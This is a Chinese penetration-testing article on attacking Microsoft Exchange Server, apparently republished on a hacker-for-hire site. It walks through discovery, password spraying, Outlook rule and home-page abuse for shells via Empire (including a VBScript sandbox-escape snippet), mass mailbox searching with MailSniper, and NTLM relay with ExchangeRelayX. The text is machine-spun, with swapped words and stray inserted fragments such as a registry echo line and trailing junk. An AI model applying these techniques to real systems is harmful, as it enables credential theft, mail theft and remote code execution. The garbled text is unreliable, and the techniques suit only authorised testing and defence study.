在浸透测验中,往往会遇到企业内网环境中运用的一些常用组件,这些组件对内或对外供应了服务与接口,也给浸透测验人员与黑客供应了新的可测验的侵犯面,合理的运用组件服务供应的功用和接口,可以帮忙浸透测验人员结束信息搜集、环境侦测,甚至通过其缝隙缺点、配备缺点、功用乱用直接拿下权限,在浸透测验与后浸透阶段到达事半功倍的作用。 Windows Exchange Server,应该是国内外运用都十分广泛的邮件服务器了,本文将环绕Exchange翻开,介绍在浸透测验中对Exchange服务器的侵犯运用。
正式初步之前,我们先对Exchange相关的一些概念与基础知识进行整理简介,便于对Exchange有简略初步的了解。
本文试验环境: 域环境:fb.com 域控:10.0.83.93,masterdc,Windows 2012 R2 Exchange服务器:10.0.83.94,test2k12,Windows 2012 R2,设备Exchange Server 2013 SP1 域内作业机:10.0.83.80,testwin7,Windows 7,设备Outlook 2013 SP1一、初识ExchangeMicrosoft Exchange Server is a mail server and calendaring server developed by Microsoft. It runs exclusively on Windows Server operating systems. —— ***
如 *** 对Exchange Server的描述,Exchange是由微软推出的用于企业环境中布置的邮件服务器。微软对外发布的之一个Exchange版别是Exchange 4.0,开始步Exchange运用X.400目录服务,随后转向运用微软的活动目录,开始步的时分微软还供应了Microsoft Exchange Client,即Exchange邮件客户端,随后被Outlook替代,时至今日,微软现已发布了10个大版别号的Exchange,本年10月份,微软推出了最新版别的Exchange Server 2019。在不同的企业环境中布置运用的Exchange版别纷歧,各版别供应的架构、功用、服务、接口都各有不同,本文将以Exchange Server 2013为例翻开叙说。
Exchange Server是一种本地化布置的 *** ,除此之外还有以SaaS的在线服务形式,这两种布置形式即各种文档或材料中常说的Exchange On-premise和Exchange Online,别的,Exchange还支撑本地化布置与云端布置共存的布置 *** ,即混合布置(Exchange Hybrid)。
1.邮件服务器人物(Server Role)Exchange是一个功用完好而巨大的邮件服务器,实际上Exchange担负的不只是是传统的邮件收发处理、邮件路由等根本的邮件功用,在微软布景下Exchange与活动目录域服务、大局编列目录及其他微软相关服务和组件也有着许多联络。Exchange邮件服务器在企业环境中运用占比十分高,其通过区别不同的服务器人物、实行各自的组件和服务以及相互之间的依存调用使得邮件处理构成一个强壮、丰厚、安稳、一同又杂乱的进程。Exchange在逻辑上分为三个层次: *** 层(network layer)、目录层(directory layer)、消息层(messaging layer),服务器人物正是在消息层上的一个细分。
Exchange Server 2013包括三个服务器人物,我们往前推动一个版别到Exchange Server 2010,来介绍Exchange服务器人物的演化和功用简述。
Exchange Server 2010包括五个服务器人物,别离是邮箱服务器(mailbox server)、集线传输服务器(hub transport server)、客户端访问服务器(client access server)、边际传输服务器(edge transport server)、一致消息服务器(unified messaging server),除了边际传输服务器以外其他人物都可以在同一台主机进步行布置增加,其间邮箱服务器、集线传输服务器、客户端访问服务器是中心服务器人物,布置这三个人物就能供应根本的邮件处理功用。
邮箱服务器(mailbox server):该人物是供应保管邮箱、公共文件夹以及相关的消息数据(如地址列表)的后端组件,是必选的服务器人物。 客户端访问服务器(client access server):接纳和处理来自于不同客户端的恳求的中间层服务器人物,该人物服务器供应了对运用不同协议进行访问的支撑,每个Exchange环境中至少需求布置一个客户端访问服务器,客户端访问服务器供应了对以下不同接口访问Exchange服务器的处理。MAPI访问POP3和IMAP4访问Outlook Web App访问(OWA)Outlook Anywhere访问Autodiscover自动发现服务可用 ***
集线传输服务器(hub transport server):或称中心传输服务器,该服务器人物的中心服务便是Microsoft Exchange Transport,担任处理Mail Flow(这又是Exchange中的一大知识点,Exchange办理员需求通过MailFlow结束邮件出站与进站配备)、对邮件进行路由、以及在Exchange安排中进行分发,该服务器人物处理一切发往归于本地邮箱的邮件和发往外部邮箱的邮件,并确保邮件发送者和接纳者的地址被正确解析并实行特定战略(如邮件地址过滤、内容过滤、格局转化等),一同,还可以进行记载、审计、增加免责声明等,正如Hub transport的意义,该服务器人物相当于一个邮件传输的中继站点,每个Exchange环境中至少需求布置一个集线传输服务器。 一致消息服务器(unified messaging server):将专用交换机(private branch exchange/PBX) 和Exchange Server集成在一同,以容许邮箱用户可以在邮件中发送存储语音消息和传真消息,可选人物。 边际传输服务器(edge transport server):该服务器人物作为专用服务器可以用于路由发往内部或外部的邮件,一般布置于 *** 鸿沟并用于设置安全鸿沟。其承受来自内部安排的邮件和来自外部可信服务器的邮件,然后运用特定的反垃圾邮件、反病毒战略,终究将通过战略选择的邮件路由到内部的集线传输服务器,可选人物。在Exchange Server 2013中,服务器人物精简为三个,别离是邮箱服务器、客户端访问服务器和边际传输服务器,其间邮箱服务器人物和客户端访问服务器人物一般被设备在同一台服务器中。
邮箱服务器:担任认证、重定向、署理来自外部不同客户端的访问恳求,首要包括客户端访问服务(Client Access service)和前端传输服务(Front End Transport service)两大组件。 客户端访问服务器:保管邮箱、公共文件夹等数据,首要包括集线传输服务(Hub Transport service)和邮箱传输服务(Mailbox Transport service)两大组件服务。 边际传输服务器:担任路由出站与入站邮件、战略运用等。在Exchange Server 2016和2019中,只需两种服务器人物,别离是邮箱服务器和边际传输服务器,一切要害人物和组件都融入到邮箱服务器中。
2.客户端/长途访问接口和协议邮件通讯分为邮件发送和邮件接纳,其间邮件发送运用一致的通讯协议,即 *** TP,而邮件的收取则有多种协议规范,如由前期的POP开展至今的POP3,现在运用广泛的IMAP,Exchange开发了私有的MAPI协议用于收取邮件,较新版别的Outlook一般运用MAPI与Exchange进行交互,除此之外前期的Outlook还运用称为Outlook Anywhere的RPC交互。下面介绍Exchange供应支撑的访问接口和协议。
Outlook Web App(OWA)
Exchange供应的Web邮箱,地址一般为 http://DOAMIN/owa/
Exchange Administrative Center(ECP)
Exchange办理中心,办理员用于办理安排中的Exchange的Web操控台,地址一般为 http://DOMAIN/ecp/
Outlook Anywhere(RPC-over-HTTP,RPC/HTTP)
前身为RPC-over-HTTP,随后在Exchange 2007和Exchange 2010中被重命名为Outlook Anywhere。RPC-over-HTTP是在Exchange 2003被提出的,在此之前,外网用户运用Exchange邮箱需求先通过VPN衔接到企业内部 *** 中,随后微软在Outlook中推出新特性Outlook Anywhere,外网用户可以直接通过Outlook Anywhere衔接运用Exchange邮箱而无需运用VPN,内网用户则通过RPC协议衔接运用Exchange。从Exchange 2013初步,Outlook不再区别内外网环境,一致运用Outlook Anywhere,一同,不需求敞开独自的RPC端口。Outlook Anywhere在Exchange Server 2013中默许敞开。
在Outlook中运用RPC-over-HTTP的衔接 *** 衔接Exchange(在协议中显现为RPC/HTTP):
MAPI(MAPI-over-HTTP,MAPI/HTTP)
一种Outlook与Exchange交互的新的传输协议,于Exchange 2013 SP1和Outlook 2013 SP1中被提出。
在Outlook中运用MAPI-over-HTTP的衔接 *** 衔接Exchange(在协议中显现为HTTP):
Exchange ActiveSync(EAS,XML/HTTP)
ActiveSync是一种答运用户通过移动设备或其他便携式设备访问和办理邮件、联络人、日历等Exchange功用的同步协议,在Windows上运用时其进程称号为wcesomm.exe。
Exchange Web Service(EWS,SOAP-over-HTTP)
Exchange供应了一套API编程接口可供开发者调用,用于访问Exchange服务器,与邮件、联络人、日历等功用进行交互和办理操作,在Exchange Server 2007中被提出。微软根据规范的Web Service开发EWS,EWS结束的客户端与服务端之间通过根据HTTP的SOAP交互。
3.Exchange功用和服务自动发现(Autodiscover)
Autodiscover自动发现是自Exchange Server 2007初步推出的一项自动服务,用于自动配备用户在Outlook中邮箱的相关设置,简化用户登陆运用邮箱的流程。假设用户账户是域账户且当时坐落域环境中,通过自动发现功用用户无需输入任何凭据信息即可登陆邮箱。自动发现服务工作于客户端访问服务器(Client Access Server)上,其实质是Outlook客户端通过LDAP查询、DNS查询等,衔接到指定域的Exchange的客户端访问服务器(Client Access Server)上。
自动发现的进程首要需求获取自动配备文件,然后根据配备文件进行衔接和配备,获取自动配备文件的进程不翻开细说了,简略来说它将找到供应自动发现服务的客户端访问服务器、访问/autodiscover/autodiscover.xml获得配备文件。
这儿有个要害当地,即正确配备DNS解析,使得Outlook客户端不管是在域环境主机上仍是外部 *** 环境,都可以正确找到自动发现服务地点的服务器。
配备称号autodiscover指向客户端访问服务器:
配备autodiscover的SRV记载:
域用户在参加域的主机上运用Outlook自动发现功用:
域用户在作业组主机上运用Outlook自动发现功用:
大局地址列表(GAL)
地址列表(Address List)记载了用户在域活动目录中的根本信息和在Exchange中的邮箱地址,用于将用户在活动目录中的特点政策与邮件地址构成相关。在Exchange中办理员可以创立不同的地址列表,用于便当办理保护安排,也便当邮箱用户通过地址列表查找特定的联络人邮箱,Exchange默许会创立一些内置的地址列表,其间包括了一个Default Global Address List(默许大局地址列表),一切邮箱用户都会被参加到这个地址列表中。
下面,我们进入正题
这儿我们将会用到两个知名度更高的Exchange运用东西,一个是Sensepost用Go结束的与Exchange进行指令行交互的东西Ruler,Ruler可以通过RPC/HTTP或许MAPI/HTTP的 *** 与Exchange进行交互,只需具有合法的用户凭据,就可以运用Ruler实行一系列的信息侦查、定向侵犯等操作。另一个是Powershell结束的MailSniper,首要用于后浸透阶段的一些信息搜集和获取。关于东西的详细介绍与用法可以去Github跟Freebuf上自行查找。
二、发现Exchange在浸透测验中,当进行信息搜集与环境侦查时,发现与辨认Exchange及其相关服务,可以有多种 *** 与途径,或许说,当你在实行一些端口扫描、称号查询等进程时,当发现如下举例的一些痕迹和扫描效果时,你应该意识到,该环境中或许存在Exchange组件。
1.端口与服务Exchange的正常工作,如上一章节所罗列的,需求多个服务与功用组件之间相互依靠与和谐,因而,设备了Exchange的服务器上会敞开某些端口对外供应服务,不同的服务与端口或许取决于服务器所设备的人物、服务器进行的配备、以及 *** 环境与访问操控的安全配备等。通过端口发现服务,来辨认承认服务器上设备了Exchange,是最惯例也是最简易的 *** 。如下是实行了一次端口扫描的效果陈述。
root@kali:~# nmap -A -O -sV -Pn 10.0.83.94Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-24 14:14 CSTNmap scan report for 10.0.83.94Host is up (0.00043s latency).Not shown: 974 filtered portsPORT STATE SERVICE VERSION25/tcp open *** tp Microsoft Exchange *** tpd| *** tp-commands: test2k12.fb.com Hello [10.0.83.11], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XRDST,|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT| *** tp-ntlm-info:| Target_Name: FB| NetBIOS_Domain_Name: FB| NetBIOS_Computer_Name: TEST2K12| DNS_Domain_Name: fb.com| DNS_Computer_Name: test2k12.fb.com| DNS_Tree_Name: fb.com|_ Product_Version: 6.3.9600|_ssl-date: 2018-12-24T06:17:42+00:00; +49s from scanner time.80/tcp open http Microsoft IIS httpd 8.5|_http-server-header: Microsoft-IIS/8.5|_http-title: 403 - xBDxFBxD6xB9xB7xC3xCExCA: xB7xC3xCExCAxB1xBBxBExDCxBExF8xA1xA381/tcp open http Microsoft IIS httpd 8.5|_http-server-header: Microsoft-IIS/8.5|_http-title: 403 - xBDxFBxD6xB9xB7xC3xCExCA: xB7xC3xCExCAxB1xBBxBExDCxBExF8xA1xA3……465/tcp open *** tp Microsoft Exchange *** tpd| *** tp-commands: test2k12.fb.com Hello [10.0.83.11], SIZE 36700160, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH GSSAPI NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOWREQUEST,|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT| *** tp-ntlm-info:| Target_Name: FB| NetBIOS_Domain_Name: FB| NetBIOS_Computer_Name: TEST2K12| DNS_Domain_Name: fb.com| DNS_Computer_Name: test2k12.fb.com| DNS_Tree_Name: fb.com|_ Product_Version: 6.3.9600|_ssl-date: 2018-12-24T06:17:37+00:00; +49s from scanner time.587/tcp open *** tp Microsoft Exchange *** tpd| *** tp-commands: test2k12.fb.com Hello [10.0.83.11], SIZE 36700160, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT| *** tp-ntlm-info:| Target_Name: FB| NetBIOS_Domain_Name: FB| NetBIOS_Computer_Name: TEST2K12| DNS_Domain_Name: fb.com| DNS_Computer_Name: test2k12.fb.com| DNS_Tree_Name: fb.com|_ Product_Version: 6.3.9600|_ssl-date: 2018-12-24T06:17:39+00:00; +49s from scanner time.……2525/tcp open *** tp Microsoft Exchange *** tpd| *** tp-commands: test2k12.fb.com Hello [10.0.83.11], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOWREQUEST,|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT|_ *** tp-ntlm-info: ERROR: Script execution failed (use -d to debug)|_ssl-date: 2018-12-24T06:17:48+00:00; +50s from scanner time.……
80端口上的IIS、25/587/2525端口上的 *** TP,及其其上详细的指纹信息,可以帮忙我们承认该主机上正工作着Exchange服务。
2.SPNs称号查询端口扫描是信息搜集阶段最常用的手法,端口扫描通过与政策主机之间的TCP/UDP协议交互,根据回来的各种信息判别端口敞开状况和服务软件,这需求直接的与政策主机进行通讯,且往往会发作规划较大的流量通讯。除了端口扫描之外,关于了解内网浸透的同学来说,通过SPN来发现服务应该也是必备手法了,这种 *** 在Windows环境中特别有用,由于其不需求与各个主机进行通讯,而是通过已有的普通用户权限,查询活动目录数据库,枚举得到SPN,然后获悉各个主机上工作着哪些服务运用。
SPN(Service Principal Name),是Kerberos认证中不行短少的,每一个启用Kerberos认证的服务都具有一个SPN,如文件同享服务的SPN为cifs/domain_name,LDAP服务的SPN为ldap/domain_name,在Kerberos认证进程,客户端通过指定SPN让KDC知晓客户端恳求访问的是哪个详细服务,并运用该服务对应的服务账号的密钥来对终究收据进行加密。关于Kerberos和SPN的更多信息不在此翻开讲,有爱好的同学可以自行查阅材料。
在活动目录数据库中,每一个计算机政策有一个特点名为servicePrincipalName,该特点的值是一个列表,存储着该计算机启用Kerberos认证的每一个服务称号。设备在Windows域环境中的Exchange服务相同会接入Kerberos认证,因而,Exchange相关的多个服务,应该都可以从该特点中找到对应的SPN。
实行SPN称号查找的东西和 *** 有许多,这儿直接以域内的一台作业机,通过setspn.exe查询获得。
可以看到,exchangeRFR/exchangeAB/exchangeMDB/ *** TP/ *** TPSvc等,触及 *** TP服务、邮件地址簿服务、客户端访问服务器人物服务等,都是Exchange注册的服务。
再次着重,SPN是启用Kerberos的服务所注册的便于KDC查找的服务称号,这些SPN称号信息被记载在活动目录数据库中,只需服务设备结束,这些SPN称号就现已存在,除非卸载或删去,SPN称号查询与当时服务是否发起没有关系(如Exchange服务器的IMAP/POP等部分服务默许是不发起的,但其SPN称号相同存在)。
除此之外,有时分通过其他一些 *** 相同可以帮忙勘探承认Exchange服务,如发现OWA、EWS接口、自动发现服务、DNS域名记载等等,Exchange是一个巨大杂乱的组件服务,各种配备信息和揭露服务都可以帮忙我们进行信息搜集。
三、Exchange接口与服务运用上文说到,Exchange供应了多种客户端邮箱接口和服务接口,关于浸透测验人员而言,这些接口便是踏入Exchange内部的之一道关卡,供应服务的接口需求有用的用户凭据信息,明显,用户名与暗码破解是摆在面前的之一个测验。在企业域环境中,Exchange与域服务调集,域用户账户暗码便是Exchange邮箱的账户暗码,因而,假设我们通过暴力破解等手法成功获取了邮箱用户暗码,在一般状况下也就直接获得了域用户暗码。
1.运用自动发现服务进行暴力破解Autodiscover自动发现服务运用Autodiscover.xml配备文件来对用户进行自动设置,获取该自动配备文件需求用户认证,如访问http://test2k12.fb.com/Autodiscover/Autodiscover.xml文件将提示需求认证,如下为认证通过,将获取到如下的XML文件内容:
运用这个接口,可以对邮箱账号做暴力破解。Ruler供应了对Exchange的自动配备文件接口进行认证的暴力破解,通过配备线程数、距离时刻可以约束破解速度避免屡次登陆失利触发告警或账户被封禁。
2.Password Spraypassword spray相同是一种破解账户暗码的 *** ,与惯例的暴力破解 *** 不同的是,password spary针对一批账户进行破解,每次对单个用户账户进行一次或少数次登陆测验后换用下一个用户进行测验,如此重复进行并距离必定时刻,以此 *** 逃避屡次暴力破解的检测和账户确定的风险。
mailsniper供应别离针对OWA接口、EWS接口和ActiveSync接口的password spray。
四、获得合法凭据的后浸透阶段当浸透测验人员已成功获得某些用户的合法邮箱凭据,或许拿到与邮箱认证相同的域账户凭据,该用户凭据或许是通过暴力破解用户名暗码得到的,或许是dump到了用户明文暗码或哈希值,或许通过其他途径获得的合法有用凭据,可以帮忙浸透测验人员进一步进行后浸透侵犯,搜集更多的灵敏信息、运用合法功用与服务进行扩展。
1.乱用Outlook功用getshellOutlook是Office工作软件中用于办理电子邮件的专用软件,Exchange邮箱用户运用Outlook进行邮件办理可以体会Exchange专用的各种功用,也是运用十分广泛的工作软件之一。Outlook功用十分强壮,其间的一些合法功用由于其特殊性,当侵犯者运用一些灵敏(而鄙陋)的手法时往往可达到意想不到的作用。
规矩和告诉功用的乱用
Outlook供应了一项 ”规矩和告诉“ (Rules and Alerts)的功用,可以设置邮件接纳和发送的战略,分为规矩条件和动作,即用户界说当邮件满意某些条件时(如邮件主题包括特定词语),触发一个特定的动作,这个动作可以是对邮件的办理、处置,甚至是发起运用程序。
当侵犯者具有合法邮箱用户凭据的状况下,可以运用该功用在正常用户收到符合某种条件的邮件时实行特定的指令,例如反弹一个shell。该运用 *** 需求留心:
侵犯者已具有有用的邮箱用户凭据; 当触发起作为发起运用程序时,只能直接调用可实行程序,如发起一个exe程序,但无法为运用程序传递参数,即无法运用powershell实行一句话代码进行反弹shell(由于只能实行powershell.exe而无法传递后边的指令行参数); 用户需求在敞开Outlook的状况下触发规矩条件才有用,在未运用Outlook的状况下无法触发起作;可是,用户通过其他客户端(如OWA)接纳阅读了该邮件,然后翻开了Outlook,依然可以触发该动作发作(只需这封邮件没有在翻开Outlook之前删去); 规矩和告诉可以通过Outlook进行创立、办理和删去,OWA对规矩和告诉的操作可用项较少(无法创立 ”发起运用程序“ 的动作);手动新建一个规矩及其触发起作,当收件主题中包括 ”pwn“ 时,发起计算器程序(calc.exe)。
发送一封邮件主题包括单词 ”pwn“ 的邮件,当用户运用Outlook时,收到该邮件之后,触发规矩,弹出计算器。
从上面的测验可以证明,该功用可以结束根据邮件主题或内容匹配发起指定运用程序,因而,可以作为一个适宜的侵犯面,在满意必定条件的状况下进行运用。总结一下该侵犯需求满意的条件:
侵犯者需求具有合法的邮箱用户凭据,且该用户运用Outlook进行邮件办理; 侵犯者需求通过Outlook登陆用户邮箱,然后为其创立一条适宜的规矩,即将实行的运用程序要么坐落用户运用Outlook的主机上,要么坐落主机可访问到的方位(如内网同享文件夹、WebDAV目录劣等);Ruler也供应了运用上述规矩和告诉功用,可以通过指令行创立规矩、发送邮件触发规矩。通过结合Empire、同享文件夹、ruler,对该功用进行运用。
运用Empire启用一个监听器,创立一句话的powershell木马。
将生成的一句话木马通过东西生成一个exe,并把该可实行文件放到内网一台机器的同享目录中。
运用ruler和已具有的合法邮箱凭据,在政策邮箱账户中创立一条规矩,规矩触发字符是 ”tcc“,规矩触发起作指向同享目录中的可实行文件。
运用ruler发送一封包括 ”tcc“ 字符串的主题的邮件,ruler将运用用户自己的邮箱给自己发送一封邮件,然后触发规矩(这一步可以在上一进程中一同结束)。
当用户运用Outlook收发邮件时,将触发规矩,并从同享目录中拉取可实行木马文件并实行,该进程没有任何异常。木马实行后shell现已成功回弹。
完事之后删掉规矩。
主页设置功用的乱用
在Outlook中,供应了一个功用答运用户在运用Outlook的时分设置收件箱界面的主页,可以通过收件箱的特点来设置加载外部URL,烘托收件箱界面。
收件箱主页URL作为收件箱的设置特点,会在客户端Outlook和Exchange服务端之间进行同步,而通过MAPI/HTTP协议与Exchange服务端的交互,可以直接设置该特点。因而,当已具有合法邮箱凭据的前提下,可以运用该功用,为邮箱用户设置收件箱主页UR/st是实行时刻L特点,将其指向包括恶意代码的页面,当用户在Outlook中阅读改写收件箱时,将触发加载恶意页面,实行恶意脚本代码,构成长途指令实行。
Outlook收件箱主页指向的URL在Outlook中通过iframe标签加载,其实行wscript或vbscript受沙箱环境约束,无法运用脚本代码创立灵敏的恶意政策,即无法直接通过CreateObject(“Wscript.Shell”)的 *** 实行指令。可是,此处可以通过载入与Outlook视图相关的ActiveX组件,然后获取ViewCtl1政策,通过该政策获取运用程序政策OutlookApplication,该政策即标明整个Outlook运用程序,然后逃出Outlook沙箱的约束,接着,就可以直接通过Outlook运用程序政策调用CreateObject *** ,来创立新的运用程序政策Wscript.Shell,实行恣意指令。该运用 *** 概况可参阅 链接1、链接2、链接3。
Set Application = ViewCtl1.OutlookApplication # 获得顶层的Outlook运用程序政策,结束逃逸Set cmd = Application.CreateObject("Wscript.Shell") # 运用Outlook运用程序政策创立新的政策,实行系统指令cmd.Run("cmd.exe")
结束该侵犯需求的前提条件:
侵犯者需求具有合法的邮箱用户凭据,且该用户运用Outlook进行邮件办理; 侵犯者通过Outlook登陆用户邮箱,为其收件箱特点设置主页URL,指向包括恶意脚本代码的页面;ruler供应了通过MAPMMS消息服务器I/HTTP的协议交互,运用合法的邮箱凭据向服务端写入收件箱主页URL特点,当用户运用Outlook并从Exchange服务端同步该设置时,其随后对收件箱的改写阅读将触发加载恶意网页,并实行恶意代码。
运用empire生成powershell一句话木马,通过Web服务器保管包括该一句话木马的恶意网页。
运用ruler和已有的合法邮箱凭据,在政策邮箱中设置收件箱主页URL,指向Web服务器上的恶意网页。
随后,用户通过Outlook阅读收件箱,empire将接纳到反弹shell,该进程Outlook收件箱或许会提示已阻挠不安全的ActiveX控件,实际上指令现已实行结束。
完事之后,删去该特点设置,假设不铲除该设置,用户随后的屡次阅读收件箱都将触发指令实行,形成empire接纳多个反弹shell。
2.检索邮件内容MailSniper可以被用户或办理员用于检索查找自己邮箱和文件夹信息,而侵犯者运用该东西,也可以在获得合法邮箱凭据之后,通过检索邮箱文件夹来测验发现和盗取包括灵敏信息的邮件数据。Mailsniper包括两个首要的cmdlet,别离是Invoke-SelfSearch和Invoke-GlobalMailSearch,用于检索邮件中的要害字。
检索当时用户的Exchange邮箱数据
# 查找邮件内容中包括pwn字符串的邮件,-Folder参数可以指定要搜索的文件夹,默许是inbox,运用时更好指定要搜索的文件夹称号(或许指定all查找一切文件),由于该东西是外国人写的,Exchange英文版收件箱为Inbox,当Exchange运用中文版时收件箱不为英文名,默许查找inbox文件夹会因找不到该文件而犯错Invoke-SelfSearch -Mailbox zhangsan@fb.com -Terms *秘要* -Folder 收件箱 -ExchangeVersion Exchange2013_SP1
检索用户zhangsan@fb.com的收件箱中包括要害字 “秘要” 的邮件。
检索一切用户的Exchange邮箱数据
运用已把握的Exchange更高权限组成员用户,为普通用户分配ApplicationImpersonation人物,使得该普通用户可以以当时用户身份合法假装其他邮箱用户,然后获得查询一切邮箱用户邮件的权限。更多关于ApplicationImpersonation role,可以检查 链接。
# 运用administrator办理员用户为普通用户zhangsan分配ApplicationImpersonation人物,检索一切邮箱用户的邮件中,包括“内部邮件”要害字的内容Invoke-GlobalMailSearch -ImpersonationAccount zhangsan -ExchHostname test2k12 -AdminUserName fb.comadministrator -ExchangeVersion Exchange2013_SP1 -Term "*内部邮件*" -Folder 收件箱
实行该检索的进程中,运用办理员权限为用户zhangsan@fb.com分配ApplicationImpersonation人物,然后获取安排中一切邮件地址列表,并通过人物派遣通过EWS服务接口逐个检索各个邮箱账户,使命完毕后,ApplicationImpersonation人物分配也被删去。
3.获取安排内的一切邮箱用户列表运用已把握的合法邮箱凭据,可以运用OWA或许EWS接口查询获取到Exchange安排中一切的邮箱用户的邮件地址,即大局地址列表。
Get-GlobalAddressList -ExchHostname test2k12 -UserName zhangsan -ExchangeVersion Exchange2013_SP1
4.查找存在缺点的用户邮箱权限派遣邮箱用户可以通过Outlook设置自己邮箱各个文件夹的权限,通过权限设置可以派遣给其他用户访问邮箱文件夹的权限,默许状况下存在两条访问规矩,别离是默许规矩和匿名规矩,但其权限等级都为“无”。假设用户通过该特点设置了邮箱文件夹(如收件箱、发件箱等)的派遣权限给其他用户,但权限派遣过于广泛时,或许导致侵犯者运用有权限的用户,直接获得政策邮箱用户的邮件访问权。如下,用户zhangsan@fb.com设置了默许一切人对收件箱具有读取的权限。
Invoke-OpenInboxFinder用于查找和发现指定邮箱用户的文件夹是否存在风险的权限派遣。
Invoke-OpenInboxFinder -ExchangeVersion Exchange2013_SP1 -ExchHostname test2k12.fb.com -EmailList .users.txt
当通过Invoke-OpenInboxFinder发现某些邮箱用户存在可读取邮件权限后,可以运用上面说到的Invoke-SelfSearch,检索该邮箱用户是否存在包括灵敏词的邮件,运用Invoke-SelfSearch时需求增加-OtherUserMailbox选项参数,该选项标明通过权限派遣缺点检索非当时用户邮箱数据。
五、NTLM中继与ExchangeNTLM Relay,又一个风趣的论题。NTLM是一种根据应战-呼应的认证交互协议,被Windows上的多种运用层协议用于身份认证,如 *** B、HTTP、MSSQL等。NTLM中继侵犯,是指侵犯者在NTLM交互进程中充任中间人的人物,在恳求认证的客户端与服务端之间传递交互信息,将客户端提交的Net-NTLM哈希截获并在随后将其重放到认证政策方,以中继重放的中间人侵犯结束无需破解用户名暗码而获取权限。关于NTLM中继侵犯的安全研讨及相关东西已有许多,也有各种新玩法层出不穷,有爱好的可以自行查阅研讨,有时刻再另作文章评论。
NTLM中继侵犯在 *** B、HTTP协议中的运用评论得比较多,其实质是运用协议通过NTLM认证的 *** 进行身份验证,因而,运用NTLM进行认证的运用都或许遭受NTLM中继侵犯。Exchange服务器供应RPC/HTTP、MAPI/HTTP、EWS等接口,都是根据HTTP构建的上层协议,其登陆 *** 通过NTLM进行,因而,NTLM中继相同适用与Exchange。
Exchange的NTLM中继侵犯由William Martin于Defcon26的讲演中提出并结束了运用东西ExchangeRelayx,可以看 这儿。
ExchangeRelayx由python结束,依靠设备结束并发起后echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionnetcache] >>2000.reg,会发起 *** B服务和2个HTTP服务, *** B服务和监听在80端口的HTTP服务用于接纳受害者主机发送的认证,监听在8000端口的HTTP服务是一个办理后台,用于办理重放侵犯成功的Exchange会话。该东西结束了将获取到的Net-NTLM哈希重放到实在Exchange服务器的EWS接口进行认证,通过EWS获取用户邮箱的邮件信息、附件下载、创立转发规矩、查询GAL等。
发起ExchangeRelayx,将办理后台监听在本地8000端口。
随后,侵犯者给政策用户发送垂钓邮件,邮件内容包括一个恶意外链,该链接可以是指向侵犯服务器80端口上的Web Server,或许是指向侵犯服务器上的 *** B同享,当用户点击该链接时,当时用户的NTLM认证将被发往侵犯服务器,侵犯服务器获得该Net-NTLM哈希时,将其重放到实在Exchange服务器以访问EWS接口,重放认证通过,办理后台可看到Exchange会话现已上线。
侵犯服务器上ExchangeRelayx的 *** B服务接纳到受害者的NTLM认证,并将其重放进行侵犯。
点击Go to Portal,ExchangeRelayx供应了一个类OWA的邮件办理界面,可以检查用户一切邮件和文件夹。
可以查询联络人信息,获取到更多邮箱用户的邮件地址。
可以下载附件,导出地址簿联络人,还可以创立邮件转发规矩,将该用户的邮件自动转发到指定邮箱。
可以看到,运用NTLM中继侵犯Exchange用户邮箱并不杂乱,其原理与NTLM中继运用于其他协议并无不同,ExchangeRelayx这套结构结束了将截获的Net-NTLM哈希重放到实在Exchange服务器的EWS服务接口上,运用该认证凭据成功获得了一个Exchange用户邮箱会话,然后结束了读取用户邮件、检查联络人列表等操作。该侵犯 *** 需求垂钓邮件的合作,或许合作Responde、Inveigh等东西施行称号查询欺骗来结束。
写在终究本文篇幅较长,从开篇介绍Exchange相关概念与基础知识,到勘探发现Exchange,通过Exchange揭露接口与服务翻开其间运用最一再的两种静态密钥如下:侵犯,在浸透测验获得必定效果时,后浸透阶段我们运用Exchange相同可以做许多工作,终究,简略介绍了NTLM中继运用于Exchange的测验。
邮件通讯是企业正常工作进程中进行沟通沟通与信息传递的重要载体,因而,邮件服务触及的相关基础设施的安全也变得至关重要,侵犯者打破 *** 鸿沟获得权限,其意图之一是盗取要害数据,也正因如此,邮件组件服务成了黑客侵犯进程中极受注重的一环。本文评论了当时运用最为广泛的邮件服务之一Exchange在浸透测验进程中的一些运用姿态,作为近一段时刻的研讨总结,一同旨在抛砖引玉,期望更多有爱好的同学一同沟通讨论。
参阅链接 https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 https://docs.microsoft.com/en-us/previous-versions/technet-magazine/ff381422(v=msdn.10)) https://docs.microsoft.com/en-us/exchange/architecture/architecture?view=exchserver-2019 https://docs.microsoft.com/en-us/exchange/client-developer/exchange-web-services/autodiscover-for-exchange https://github.com/sensepost/ruler https://silentbreaksecurity.com/malicious-outlook-rules/ https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/ https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/ https://github.com/dafthack/MailSniper https://www.blackhillsinfosec.com/abusing-exchange-mailbox-permissions-mailsniper/ https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/ https://blog.quickbreach.io/one-click-to-owa/ https://github.com/quickbreach/ExchangeRelayX作者:斗象才能中心 TCC – Cody
黑客技术网站:深化Exchange Server在 *** 渗透下的使用办法
· MFTParentReferencewhen "A"find_element_by_name
[1][2][3]黑客接单网
